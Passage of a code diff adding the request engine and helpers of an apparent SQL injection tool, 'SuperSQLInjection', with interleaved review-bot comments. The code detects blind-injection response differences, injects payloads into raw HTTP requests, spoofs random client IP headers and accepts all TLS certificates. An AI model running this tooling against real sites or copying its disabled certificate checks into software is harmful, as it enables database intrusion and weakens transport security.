foreach (String ckey in Keys) { + if (falseString.IndexOf(ckey) == -1 && trueString.IndexOf(ckey) >= 0) { + return ckey; + } + } + for (int length = 5; length >= 1; length--) + { + for (int i = 0; i < trueString.Length - length; i++) + { + if (trueString.Length <= length && !trueString.Equals(falseString)) + { + return trueString; + } + 
String tempKey = trueString.Substring(i, length); + if (falseString.IndexOf(tempKey) == -1&& oldString.IndexOf(key)>=0) + { + key = tempKey; + Regex regex = new Regex("[\\S]+"); + //非制表符,返回结果,否则继续查看是否还有其他关键词 + if (regex.IsMatch(key)) { + return key; + } + } + + } + + } + return key; + + } + catch (Exception e) + { + + Tools.SysLog("warin:查找注入关键字发生错误," + e.Message); + + } + return ""; + } + public static int findKeyByCode(int trueCode, int falseCode) + { + if (trueCode != falseCode) { + return trueCode; + } + return 0; + + } + + public static int findKeyByTime(int trueTime, int falseTime,int maxTime) + { + if (trueTime > maxTime&&falseTime 0) + { + return url.Substring(0,index); + + } + else { + + return url; + } + } + + public static String getCurrentPath(String url) + { + int index =url.LastIndexOf("/"); + + if (index != -1) + { + return url.Substring(0,index)+"/"; + } + else { + return ""; + } + } + + public static String getRootDomain(String domain) + { + int index = domain.LastIndexOf("."); + + if (index>0) + { + int index2 = domain.LastIndexOf(".", index - 1); + if (index2 != -1) + { + return domain.Substring(index2+1); + } + + } + return domain; + } + + public static String md5_16(String str){ + MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider(); + String t2 = BitConverter.ToString(md5.ComputeHash(UTF8Encoding.UTF8.GetBytes(str)), 4, 8); + t2 = t2.Replace("-", ""); + t2 = t2.ToLower(); + return t2; + } + public static String md5_32(String str) + { + MD5 md5 = MD5.Create();//实例化一个md5对像 + // 加密后是一个字节类型的数组,这里要注意编码UTF8/Unicode等的选择  + byte[] s = md5.ComputeHash(Encoding.UTF8.GetBytes(str)); + // 通过使用循环,将字节类型的数组转换为字符串,此字符串是常规字符格式化所得 + String pwd = ""; + for (int i = 0; i < s.Length; i++) + { + //将得到的字符串使用十六进制类型格式。格式后的字符是小写的字母,如果使用大写(X)则格式后的字符是大写字符 + pwd = pwd + s[i].ToString("X"); + } + return pwd; + + } + public static bool isExistsNode(TreeNodeCollection tvws, String key) + { + + foreach (TreeNode tn in tvws) + { + + if (tn.Text.Equals(key)) + { + 
return true; + } + } + + return false; + + } + + + public static String changeRequestMethod(String datapack) + { + if (datapack.StartsWith("GET")) + { + int pl = datapack.IndexOf("?"); + if (pl != -1) { + int el = datapack.IndexOf(" ",pl); + if (el != -1) { + + String cparams= datapack.Substring(pl+1,el-pl-1); + datapack = datapack.Replace("?"+ cparams,""); + int sl= datapack.IndexOf("\r\n"); + datapack= datapack.Insert(sl, "\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0"); + int ssl = datapack.IndexOf("\r\n\r\n"); + if (!datapack.EndsWith("\r\n\r\n")) { + + datapack += "\r\n\r\n"; + } + datapack+=cparams; + + int me = datapack.IndexOf(" "); + if (me != -1) { + + datapack = "POST" + datapack.Substring(me, datapack.Length - me); + } + + return datapack; + } + } + } + + else if (datapack.StartsWith("POST")) + { + int ssl = datapack.IndexOf("\r\n\r\n"); + + if (ssl != -1) { + + + String cparams = datapack.Substring(ssl+4,datapack.Length- ssl - 4); + datapack = datapack.Substring(0, ssl+1); + int cys = datapack.IndexOf("Content-Type"); + int cye = datapack.IndexOf("\r\n",cys); + + if (cye > cys) { + datapack=datapack.Remove(cys, cye - cys+2); + } + int cls = datapack.IndexOf("Content-Length"); + int cle = datapack.IndexOf("\r\n", cls+1); + if (cle > cls) + { + datapack = datapack.Remove(cls, cle - cls+2); + } + + int hl = datapack.IndexOf(" HTTP"); + if (hl != -1) { + + datapack = datapack.Insert(hl, "?"+cparams); + } + + int me = datapack.IndexOf(" "); + + if (me != -1) + { + + datapack = "GET" + datapack.Substring(me, datapack.Length - me); + } + } + } + + return datapack; + + } + } +} diff --git a/SuperSQLInjection/tools/XML.cs b/SuperSQLInjection/tools/XML.cs new file mode 100644 index 0000000..24e16c4 --- /dev/null +++ b/SuperSQLInjection/tools/XML.cs 
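Review bot: `md5_32` formats each digest byte with `s[i].ToString("X")`, which drops the leading zero of any byte below 0x10. The result is therefore shorter than 32 characters for many inputs and will not compare equal to a standard MD5 hex string. Changing the line to `pwd = pwd + s[i].ToString("X2");` pads every byte to two digits and keeps the current upper-case output. Note that `md5_16` lower-cases its result, so the two helpers disagree on case; a one-line comment on each stating the output format would prevent mismatched comparisons.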
@@ -0,0 +1,124 @@ +using System; +using System.Collections.Generic; +using System.Text; +using System.Xml; +using SuperSQLInjection.model; +using System.IO; +using System.Xml.Serialization; +using System.Windows.Forms; + +namespace SuperSQLInjection.tools +{ + class XML + { + public static Boolean SaveMyConfig(){ + XmlDocument doc = new XmlDocument(); + XmlDeclaration xdl= doc.CreateXmlDeclaration("1.0", "UTF-8", null); + doc.AppendChild(xdl); + return true; + } + + public static void saveConfig(String fileName,Config config) + { + Stream fStream = null; + try + { + fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite); + //创建XML序列化器,需要指定对象的类型 + XmlSerializer xmlFormat = new XmlSerializer(typeof(Config)); + xmlFormat.Serialize(fStream, config); + + } + catch (Exception e) + { + + throw e; + } + finally { + if(fStream!=null){ + fStream.Close(); + } + + } + } + + public static Config readConfig(String configPath) + { + Stream fStream = null; + try + { + XmlSerializer xml = new XmlSerializer(typeof(Config)); + //创建XML序列化器,需要指定对象的类型 + fStream = new FileStream(configPath, FileMode.Open, FileAccess.ReadWrite); + XmlTextReader reader = new XmlTextReader(fStream); + reader.Normalization = false; + Config config = (Config)xml.Deserialize(reader); + return config; + } + catch (Exception e) + { + + throw e; + } + finally { + if (fStream != null) { + + fStream.Close(); + } + } + } + + public static void saveDBS(String fileName, DataBase dbs) + { + Stream fStream = null; + try + { + fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite); + //创建XML序列化器,需要指定对象的类型 + XmlSerializer xmlFormat = new XmlSerializer(typeof(DataBase)); + xmlFormat.Serialize(fStream, dbs); + } + catch (Exception e) + { + + throw e; + } + finally + { + if (fStream != null) + { + fStream.Close(); + } + + } + } + + public static DataBase readDBS(String path) + { + Stream fStream = null; + try + { + XmlSerializer xml = new XmlSerializer(typeof(DataBase)); + 
//创建XML序列化器,需要指定对象的类型 + fStream = new FileStream(path, FileMode.Open, FileAccess.ReadWrite); + XmlTextReader reader = new XmlTextReader(fStream); + reader.Normalization = false; + DataBase config = (DataBase)xml.Deserialize(reader); + return config; + } + catch (Exception e) + { + + throw e; + } + finally + { + if (fStream != null) + { + + fStream.Close(); + } + } + } + } +} diff --git a/SuperSQLInjection/tools/encode/URLEncode.cs b/SuperSQLInjection/tools/encode/URLEncode.cs new file mode 100644 index 0000000..c0234a2 --- /dev/null +++ b/SuperSQLInjection/tools/encode/URLEncode.cs 
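Review bot: `readConfig` and `readDBS` pass an `XmlTextReader` with default settings to `XmlSerializer.Deserialize`. On older .NET Framework versions that reader processes DTDs and resolves external entities by default, so a config or database file received from someone else could cause local file reads or outbound requests when it is opened (the target framework is not visible in this hunk). Adding `reader.DtdProcessing = DtdProcessing.Prohibit;` and `reader.XmlResolver = null;` after `reader.Normalization = false;` in both methods closes that (`ProhibitDtd = true` on frameworks before 4.0). Both methods also open the file with `FileAccess.ReadWrite` although they only read; `FileAccess.Read` is enough. The `catch (Exception e) { throw e; }` blocks here and in `URLTools.getHostAndPathQueryByURL` reset the stack trace; `throw;` or removing the catch preserves it.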
@@ -0,0 +1,101 @@ +using System; +using System.Collections.Generic; +using System.Text; + +namespace SuperSQLInjection.tools +{ + class URLEncode + { + + public static string UrlEncode(string sInput) + { + return UrlEncodeChars(sInput, Encoding.UTF8); + } + public static string UrlEncode(string sInput, Encoding oEnc) + { + return UrlEncodeChars(sInput, oEnc); + } + private static string UrlEncodeChars(string str, Encoding oEnc) + { + if (string.IsNullOrEmpty(str)) + { + return str; + } + StringBuilder stringBuilder = new StringBuilder(); + for (int i = 0; i < str.Length; i++) + { + char c = str[i]; + if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '.' || c == '(' || c == ')' || c == '*' || c == '\'' || c == '_' || c == '!') + { + stringBuilder.Append(c); + } + else + { + byte[] bytes = oEnc.GetBytes(new char[]{c}); + byte[] array = bytes; + for (int j = 0; j < array.Length; j++) + { + byte b = array[j]; + stringBuilder.Append("%"); + stringBuilder.Append(b.ToString("x2")); + } + } + } + return stringBuilder.ToString(); + } + // Fiddler.Utilities + public static string UrlPathEncode(string str) + { + if (string.IsNullOrEmpty(str)) + { + return str; + } + int num = str.IndexOf('?'); + if (num >= 0) + { + return UrlPathEncode(str.Substring(0, num)) + str.Substring(num); + } + return UrlPathEncodeChars(str); + } + + private static string UrlPathEncodeChars(string str) + { + if (string.IsNullOrEmpty(str)) + { + return str; + } + StringBuilder stringBuilder = new StringBuilder(); + for (int i = 0; i < str.Length; i++) + { + char c = str[i]; + if (c > ' ' && c < '\u007f') + { + stringBuilder.Append(c); + } + else + { + if (c < '!') + { + stringBuilder.Append("%"); + stringBuilder.Append(((byte)c).ToString("X2")); + } + else + { + byte[] bytes = Encoding.UTF8.GetBytes(new char[] + { + c + }); + byte[] array = bytes; + for (int j = 0; j < array.Length; j++) + { + byte b = array[j]; + stringBuilder.Append("%"); + 
stringBuilder.Append(b.ToString("X2")); + } + } + } + } + return stringBuilder.ToString(); + } + } +} diff --git a/SuperSQLInjection/tools/encode/URLTools.cs b/SuperSQLInjection/tools/encode/URLTools.cs new file mode 100644 index 0000000..e49eea1 --- /dev/null +++ b/SuperSQLInjection/tools/encode/URLTools.cs @@ -0,0 +1,27 @@ +using System; +using System.Collections.Generic; +using System.Text; +using model; + +namespace SuperSQLInjection.tools +{ + class URLTools + { + public static ServerInfo getHostAndPathQueryByURL(String url){ + + try + { + ServerInfo server = new ServerInfo(); + Uri uri = new Uri(url); + server.host = uri.Host; + server.url = uri.PathAndQuery; + server.port = uri.Port; + return server; + } + catch (Exception e) { + + throw e; + } + } + } +} diff --git a/SuperSQLInjection/tools/file/FileTool.cs b/SuperSQLInjection/tools/file/FileTool.cs new file mode 100644 index 0000000..1f99ee9 --- /dev/null +++ b/SuperSQLInjection/tools/file/FileTool.cs 
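Review bot: `UrlEncodeChars` and `UrlPathEncodeChars` encode one `char` at a time with `GetBytes(new char[]{c})`. A character outside the Basic Multilingual Plane is two surrogate `char`s, so it is emitted as two replacement sequences instead of its real bytes. Pairing the surrogates before encoding fixes it, e.g. `byte[] bytes = char.IsHighSurrogate(c) && i + 1 < str.Length ? oEnc.GetBytes(new char[] { c, str[++i] }) : oEnc.GetBytes(new char[] { c });`. The two methods also differ in hex case (`"x2"` versus `"X2"`) and neither documents which characters it leaves unescaped; a summary comment listing the pass-through set would make the difference from `Uri.EscapeDataString` explicit.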
@@ -0,0 +1,217 @@ +using System; +using System.Collections.Generic; +using System.Text; +using System.IO; + +namespace tools +{ + class FileTool + { + public static List readAllDic(String dic) + { + List fs = new List(); + try + { + DirectoryInfo din = new DirectoryInfo(AppDomain.CurrentDomain.BaseDirectory+"/"+dic); + FileInfo[] files = din.GetFiles(); + foreach (FileInfo f in files) + { + fs.Add(f.Name); + } + } + catch (Exception re) + { + Tools.SysLog(dic + "读取错误!" + re.Message); + } + return fs; + } + public static List readFileToList(String path) + { + + List list = new List(); + FileStream fs_dir = null; + StreamReader reader = null; + try + { + fs_dir = new FileStream(AppDomain.CurrentDomain.BaseDirectory + "/" + path, FileMode.Open, FileAccess.Read); + + reader = new StreamReader(fs_dir); + + String lineStr; + + while ((lineStr = reader.ReadLine()) != null) + { + if (!lineStr.Equals("")) + { + list.Add(lineStr); + } + } + } catch (Exception e) + { + Tools.SysLog(e.Message); + } + finally { + if (reader != null) + { + reader.Close(); + } + if (fs_dir != null) + { + fs_dir.Close(); + } + } + return list; + } + + public static HashSet readDomainToList(String path,Boolean isCleanExists) + { + + HashSet list = new HashSet(); + FileStream fs_dir = null; + StreamReader reader = null; + try + { + fs_dir = new FileStream(path, FileMode.Open, FileAccess.Read); + + reader = new StreamReader(fs_dir); + + String lineStr; + + while ((lineStr = reader.ReadLine()) != null) + { + if (!lineStr.Equals("")&&!lineStr.StartsWith("http")) { + lineStr = "http://" + lineStr; + } + if (list.Contains(lineStr) && isCleanExists) { + continue; + } + list.Add(lineStr); + + } + } + catch (Exception e) + { + Tools.SysLog(e.Message); + } + finally + { + if (reader != null) + { + reader.Close(); + } + if (fs_dir != null) + { + fs_dir.Close(); + } + } + return list; + } + + //读取文件 + public static String readFileToString(String path) + { + String str = ""; + FileStream fs_dir=null; + 
StreamReader reader = null; + try + { + fs_dir = new FileStream(AppDomain.CurrentDomain.BaseDirectory + "/" + path, FileMode.Open, FileAccess.Read); + reader = new StreamReader(fs_dir); + str = reader.ReadToEnd(); + } + catch (Exception e) + { + Tools.SysLog("readFileToString发生异常!"+e.Message); + }finally + { + if (reader != null) + { + reader.Close(); + } + if (fs_dir != null) + { + fs_dir.Close(); + } + } + return str; + + } + //读取文件 + public static Byte[] readFileToByte(String path,int a) + { + Byte[] buffer = null; + FileStream fs_dir=null; + StreamReader reader = null; + try + { + fs_dir = new FileStream(path, FileMode.Open, FileAccess.Read); + BinaryReader br = new BinaryReader(fs_dir); + int len = (int)fs_dir.Length; + + buffer = new byte[len]; + + int size = br.Read(buffer, 0, len); + + reader.Read(); + + } + catch (Exception e) + { + Tools.SysLog("readFileToByte-error:读取文件内容发生错误!"+e.Message); + }finally + { + if (reader != null) + { + reader.Close(); + } + if (fs_dir != null) + { + fs_dir.Close(); + } + } + return buffer; + + } + public static object c = ""; + public static String error = ""; + public static void AppendLogToFile(String path,String log) + { + //锁住,防止多线程引发错误 + lock (c) + { + List list = new List(); + FileStream fs_dir = null; + StreamWriter sw = null; + try + { + fs_dir = new FileStream(AppDomain.CurrentDomain.BaseDirectory + "/" + path, FileMode.Append, FileAccess.Write); + + sw = new StreamWriter(fs_dir); + + sw.WriteLine(log); + + sw.Close(); + + fs_dir.Close(); + + } + catch (Exception e) + { + error = "文件操作发生异常!" + e.Message; + } + finally + { + if (sw != null) + { + sw.Close(); + } + if (fs_dir != null) + { + fs_dir.Close(); + } + } + } + + } + } +} diff --git a/SuperSQLInjection/tools/http/HTTP.cs b/SuperSQLInjection/tools/http/HTTP.cs new file mode 100644 index 0000000..16d87bd --- /dev/null +++ b/SuperSQLInjection/tools/http/HTTP.cs 
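Review bot: `readFileToByte` calls `reader.Read();` on a `StreamReader` that is still `null`, so every call throws a NullReferenceException that the catch logs as a read error, and the caller receives the buffer anyway. `br.Read(buffer, 0, len)` may also return fewer bytes than requested, and its result `size` is ignored. Replacing the body of the try with `buffer = File.ReadAllBytes(path);` removes both problems. Separately, `AppendLogToFile` locks on `public static object c = ""`, an interned string literal that is publicly reassignable and shared with any other code locking on `""`; `private static readonly object logLock = new object();` is a safer lock target.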
@@ -0,0 +1,933 @@ +using System; +using System.Collections.Generic; +using System.Text; +using tools; +using System.Net; +using System.Net.Sockets; +using model; +using System.IO.Compression; +using System.IO; +using System.Net.Security; +using System.Text.RegularExpressions; +using System.Threading; +using System.Diagnostics; +using System.Security.Authentication; +using System.Security.Cryptography.X509Certificates; +using SuperSQLInjection.bypass; +using SuperSQLInjection.tools.http; +using System.Runtime.Serialization.Formatters.Binary; + +namespace SuperSQLInjection.tools +{ + public class HTTP + { + + public const char T = '\n'; + public const String CT = "\r\n"; + public const String AutoGetEncoding = "自动识别"; + public const String DefaultEncoding = "UTF-8"; + public const String CTRL = "\r\n\r\n"; + public const String Content_Length_Str = "content-length: "; + public const String Content_Length_Str_M = "Content-Length: "; + public const String Content_Length = "content-length"; + public const String Content_Encoding = "content-encoding"; + public const String Transfer_Encoding = "transfer-encoding"; + public const String Connection = "connection"; + public const int WaitTime =10; + public static Main main = null; + public static long index = 0; + + public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED"; + public static String postTemplate = "POST /search/index.htm HTTP/1.1\r\nReferer: http://www.shack2.org/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 5\r\nHost: 
www.shack2.org\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nCookie: CNZZDATA4159773=cnzz_eid%3D217492251-1446476958-%26ntime%3D1447834260; bdshare_firstime=1446476958863\r\n\r\nkey=s"; + public void initMain(Main m) + { + main = m; + } + + /** + * + 发生异常尝试重连 + * + */ + public static ServerInfo sendRequestRetry(Boolean isSSL, int tryCount, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet) + { + int count = 0; + + ServerInfo server = new ServerInfo(); + timeout = timeout * 1000; + while (true) + { + if (count >tryCount) break; + + try + { + if (!isSSL) + { + server = sendHTTPRequest(count, host, port, payload, request, timeout, encoding, foward_302,redirectDoGet); + return server; + } + else + { + + server = sendHTTPSRequest(count, host, port, payload, request, timeout, encoding, foward_302, redirectDoGet); + return server; + + } + } + catch (Exception e) + { + Tools.SysLog("发包发生异常,正在重试----" + e.Message); + server.timeout = true; + continue; + } + finally + { + count++; + } + + } + return server; + + } + + private static void checkContentLength(ref ServerInfo server,ref String request) { + + //重新计算并设置Content-length + int sindex = request.IndexOf(CTRL); + server.reuqestHeader = request; + if (sindex != -1) + { + server.reuqestHeader = request.Substring(0, sindex); + server.reuqestBody = request.Substring(sindex + 4, request.Length - sindex - 4); + int contentLength = Encoding.UTF8.GetBytes(server.reuqestBody).Length; + String newContentLength = Content_Length_Str_M + contentLength; + //产生随机ip头 + if (!String.IsNullOrEmpty(main.config.randIPToHeader)) + { + request = request.Insert(sindex, "\r\n" + main.config.randIPToHeader + ": " + Tools.randIP()); + } + + if (request.IndexOf(Content_Length_Str_M) != -1) + { + request = Regex.Replace(request, Content_Length_Str_M + "\\d+", newContentLength); + } + else + { + request = request.Insert(sindex, "\r\n" + newContentLength); + } + } + else + { + 
//产生随机ip头 + if (!String.IsNullOrEmpty(main.config.randIPToHeader)) + { + request = request + "\r\n" + main.config.randIPToHeader + ": " + Tools.randIP(); + } + request = Regex.Replace(request, Content_Length_Str + "\\d+", Content_Length_Str_M + "0"); + request += CTRL; + } + + + } + + private static void doHeader(ref ServerInfo server, ref String[] headers, ref String encoding) + { + try + { + for (int i = 0; i < headers.Length; i++) + { + if (i == 0) + { + String[] codesplit = headers[i].Split(' '); + if (codesplit.Length > 0) + { + String[] sh = headers[i].Split(' '); + if (sh.Length > 1) { + server.code = Tools.convertToInt(sh[1]); + } + } + else { + server.code = 0; + } + } + else + { + String[] kv = Regex.Split(headers[i], ": "); + String key = kv[0].ToLower(); + if (!server.headers.ContainsKey(key)) + { + //自动识别编码 + if ("自动识别".Equals(encoding)) { + if ("content-type".Equals(key)) + { + String hecnode = getHTMLEncoding(kv[1], ""); + if (!String.IsNullOrEmpty(hecnode)) + { + server.encoding = hecnode; + } + } + } + + if (kv.Length > 1) + { + server.headers.Add(key, kv[1]); + } + else + { + server.headers.Add(key, ""); + } + } + } + } + } + catch (Exception e) { + throw e; + } + + + } + + private static ServerInfo sendHTTPRequest(int count, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet) + { + Interlocked.Increment(ref HTTP.index); + String index = Thread.CurrentThread.Name+ Interlocked.Read(ref HTTP.index); + Stopwatch sw = new Stopwatch(); + sw.Start(); + ServerInfo server = new ServerInfo(); + TcpClient clientSocket = null; + int sum = 0; + Boolean isupdateEncoding = false; + try + { + if (port > 0 && port <= 65556) + { + + request = request.Replace(Main.setInjectStr, payload); + request = StringReplace.strReplaceCenter(main.config, request, main.replaceList); + //编码处理 + server.request = request; + TimeOutSocket tos = new TimeOutSocket(); + clientSocket = tos.Connect(host, port, 
timeout); + if (sw.ElapsedMilliseconds >= timeout) + { + return server; + } + clientSocket.SendTimeout = timeout - tos.useTime; + if (clientSocket.Connected) + { + checkContentLength(ref server, ref request); + server.request = request; + + byte[] requestByte = Encoding.UTF8.GetBytes(request); + clientSocket.Client.Send(requestByte); + byte[] responseBody = new byte[1024 * 1000]; + int len = 0; + //获取header头 + String tmp = ""; + StringBuilder sb = new StringBuilder(); + clientSocket.ReceiveTimeout = timeout - (int)sw.ElapsedMilliseconds; + do + { + byte[] responseHeader = new byte[1]; + len = clientSocket.Client.Receive(responseHeader, 1, SocketFlags.None); + if (len <= 0) { + Thread.Sleep(WaitTime); + } + if (len == 1) + { + + char c = (char)responseHeader[0]; + sb.Append(c); + if (c.Equals(T)) + { + tmp = String.Concat(sb[sb.Length - 4], sb[sb.Length - 3], sb[sb.Length - 2], c); + } + } + } while (!tmp.Equals(CTRL) && sw.ElapsedMilliseconds < timeout); + + server.header = sb.ToString().Replace(CTRL, ""); + String[] headers = Regex.Split(server.header, CT); + if (headers != null && headers.Length > 0) + { + //处理header + doHeader(ref server, ref headers, ref encoding); + //302 301跳转 + if ((server.code == 302 || server.code == 301) && foward_302) + { + StringBuilder rsb = new StringBuilder(server.request); + int urlStart = server.request.IndexOf(" ") + 1; + int urlEnd = server.request.IndexOf(" HTTP"); + if (urlStart != -1 && urlEnd != -1) + { + String url = server.request.Substring(urlStart, urlEnd - urlStart); + rsb.Remove(urlStart, url.Length); + String location = server.headers["location"]; + if (!server.headers["location"].StartsWith("/") && !server.headers["location"].StartsWith("http")) + { + location = Tools.getCurrentPath(url) + location; + } + location = location.Replace(" ", "%20"); + rsb.Insert(urlStart, location); + String newReuqest = rsb.ToString(); + if (server.request.StartsWith("POST") && redirectDoGet) { + rsb.Remove(0, 4); + rsb.Insert(0, "GET"); 
+ } + return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet); + } + + } + + + //根据请求头解析 + if (server.headers.ContainsKey(Content_Length)) + { + int length = int.Parse(server.headers[Content_Length]); + + while (sum < length && sw.ElapsedMilliseconds < timeout) + { + int readsize = length - sum; + len = clientSocket.Client.Receive(responseBody, sum, readsize, SocketFlags.None); + if (len > 0) + { + sum += len; + } + if(len<=0&& sum < length) { + Thread.Sleep(WaitTime); + } + } + } + //解析chunked传输 + else if (server.headers.ContainsKey(Transfer_Encoding)) + { + //读取长度 + int chunkedSize = 0; + byte[] chunkedByte = new byte[1]; + //读取总长度 + sum = 0; + do + { + String ctmp = ""; + do + { + len = clientSocket.Client.Receive(chunkedByte, 1, SocketFlags.None); + if(len<=0) { + Thread.Sleep(WaitTime); + } + ctmp += Encoding.UTF8.GetString(chunkedByte); + + } while ((ctmp.IndexOf(CT) == -1) && (sw.ElapsedMilliseconds < timeout)); + + chunkedSize = Tools.convertToIntBy16(ctmp.Replace(CT, "")); + + //chunked的结束0\r\n\r\n是结束标志,单个chunked块\r\n结束 + if (ctmp.Equals(CT)) + { + continue; + } + if (chunkedSize == 0) + { + //结束了 + break; + } + int onechunkLen = 0; + while (onechunkLen < chunkedSize && sw.ElapsedMilliseconds < timeout) + { + len = clientSocket.Client.Receive(responseBody, sum, chunkedSize - onechunkLen, SocketFlags.None); + if (len > 0) + { + onechunkLen += len; + sum += len; + } + if(len<=0&& onechunkLen < chunkedSize) + { + Thread.Sleep(WaitTime); + } + } + + //判断 + } while (sw.ElapsedMilliseconds < timeout); + } + //connection close方式或未知body长度 + else + { + while (sw.ElapsedMilliseconds < timeout) + { + if (clientSocket.Client.Poll(timeout, SelectMode.SelectRead)) + { + if (clientSocket.Available > 0) + { + len = clientSocket.Client.Receive(responseBody, sum, (1024 * 200) - sum, SocketFlags.None); + if (len > 0) + { + sum += len; + } + else + { + Thread.Sleep(WaitTime); + } + } + else + { + break; + } + } + } + } + + 
//自动识别编码 + if (AutoGetEncoding.Equals(encoding)) + { + if (!String.IsNullOrEmpty(server.encoding)) + { + encoding = server.encoding;//header找到编码 + } + else { + encoding = DefaultEncoding;//默认一个编码 + isupdateEncoding = true;//body找编码 + } + Encoding encod = Encoding.GetEncoding(encoding); + getBody(ref server, ref responseBody, ref sum, ref encod, ref index); + //修正编码 + if (isupdateEncoding) + { + String cEncoding = getHTMLEncoding("", server.body); + if (!String.IsNullOrEmpty(cEncoding)) + { + server.encoding = cEncoding;//body找到编码 + getBody(ref server, ref responseBody, ref sum, ref encod, ref index); + } + + } + } + else { + //指定编码 + Encoding encod = Encoding.GetEncoding(encoding); + getBody(ref server, ref responseBody, ref sum, ref encod, ref index); + } + + } + } + + } + } + catch (Exception e) + { + Exception ee = new Exception("HTTP发包错误!错误消息:" + e.Message + e.TargetSite.Name + "----发包编号:" + index); + throw ee; + } + finally + { + sw.Stop(); + server.length = sum; + server.runTime = (int)sw.ElapsedMilliseconds; + if (clientSocket != null) + { + clientSocket.Close(); + } + + if (main.config.isOpenHTTPLog) + { + server.sleepTime = main.config.sendHTTPSleepTime; + Tools.sysHTTPLog(index, server); + main.Invoke(new Main.sendHTTPLogDelegate(main.sendHTTPLog), index, server, payload); + } + if (main.config.sendHTTPSleepTime > 0) + { + Thread.Sleep(main.config.sendHTTPSleepTime); + } + } + return server; + + } + + + private static void getBody(ref ServerInfo server, ref byte[] responseBody, ref int sum, ref Encoding encod, ref String index) { + if (server.headers.ContainsKey(Content_Encoding)) + { + if (server.headers[Content_Encoding].IndexOf("gzip") != -1) + { + server.body = unGzip(responseBody, sum, encod, index); + } + else if (server.headers[Content_Encoding].IndexOf("deflate") != -1) + { + server.body = unDeflate(responseBody, sum, encod, index); + } + else { + server.body = encod.GetString(responseBody, 0,sum); + } + + } + else + { + server.body = 
encod.GetString(responseBody, 0, sum); + } + } + + private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { + return true; + } + private static ServerInfo sendHTTPSRequest(int count, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet) + { + Interlocked.Increment(ref HTTP.index); + String index = Thread.CurrentThread.Name + Interlocked.Read(ref HTTP.index); + Stopwatch sw = new Stopwatch(); + sw.Start(); + ServerInfo server = new ServerInfo(); + Boolean isupdateEncoding = false; + int sum = 0; + + TcpClient clientSocket = null; ; + + try + { + + if (port > 0 && port <= 65556) + { + request = request.Replace(Main.setInjectStr, payload); + + //编码处理 + request = StringReplace.strReplaceCenter(main.config, request, main.replaceList); + + TimeOutSocket tos = new TimeOutSocket(); + clientSocket = tos.Connect(host, port, timeout); + if (sw.ElapsedMilliseconds >= timeout) + { + return server; + } + clientSocket.SendTimeout = timeout - tos.useTime; + + SslStream ssl = null; + if (clientSocket.Connected) + { + ssl = new SslStream(clientSocket.GetStream(), false, new RemoteCertificateValidationCallback(ValidateServerCertificate)); + SslProtocols protocol = SslProtocols.Ssl3 | SslProtocols.Ssl2 | SslProtocols.Tls; + ssl.AuthenticateAsClient(host, null, protocol, false); + if (ssl.IsAuthenticated) + { + checkContentLength(ref server, ref request); + server.request = request; + byte[] requestByte = Encoding.UTF8.GetBytes(request); + ssl.Write(requestByte); + ssl.Flush(); + } + } + server.request = request; + byte[] responseBody = new byte[1024 * 1000]; + int len = 0; + //获取header头 + String tmp = ""; + + StringBuilder sb = new StringBuilder(); + StringBuilder bulider = new StringBuilder(); + clientSocket.ReceiveTimeout = timeout - (int)sw.ElapsedMilliseconds; + do + { + byte[] responseHeader = new byte[1]; + int read = 
ssl.ReadByte(); + if (read <= 0) + { + Thread.Sleep(WaitTime); + } + char c = (char)read; + sb.Append(c); + if (c.Equals(T)) + { + tmp = String.Concat(sb[sb.Length - 4], sb[sb.Length - 3], sb[sb.Length - 2], c); + } + + } while (!tmp.Equals(CTRL) && sw.ElapsedMilliseconds < timeout); + + server.header = sb.ToString().Replace(CTRL, ""); + String[] headers = Regex.Split(server.header, CT); + //处理header + doHeader(ref server, ref headers,ref encoding); + //302 301跳转 + if ((server.code == 302 || server.code == 301) && foward_302) + { + + StringBuilder rsb = new StringBuilder(server.request); + int urlStart = server.request.IndexOf(" ") + 1; + int urlEnd = server.request.IndexOf(" HTTP"); + if (urlStart != -1 && urlEnd != -1) + { + String url = server.request.Substring(urlStart, urlEnd - urlStart); + rsb.Remove(urlStart, url.Length); + String location = server.headers["location"]; + if (!server.headers["location"].StartsWith("/") && !server.headers["location"].StartsWith("http")) + { + location = Tools.getCurrentPath(url) + location; + } + location = location.Replace(" ", "%20"); + rsb.Insert(urlStart, location); + String newReuqest = rsb.ToString(); + if (rsb.ToString().StartsWith("POST") && redirectDoGet) + { + rsb.Remove(0, 4); + rsb.Insert(0, "GET"); + } + + return sendHTTPSRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet); + } + + + + + } + + + //根据请求头解析 + if (server.headers.ContainsKey(Content_Length)) + { + int length = int.Parse(server.headers[Content_Length]); + while (sum < length && sw.ElapsedMilliseconds < timeout) + { + len = ssl.Read(responseBody, sum, length - sum); + if (len > 0) + { + sum += len; + } + if (len <= 0 && sum < length) + { + Thread.Sleep(WaitTime); + } + } + } + //解析chunked传输 + else if (server.headers.ContainsKey(Transfer_Encoding)) + { + //读取长度 + int chunkedSize = 0; + byte[] chunkedByte = new byte[1]; + //读取总长度 + sum = 0; + do + { + String ctmp = ""; + do + { + len = ssl.Read(chunkedByte, 0, 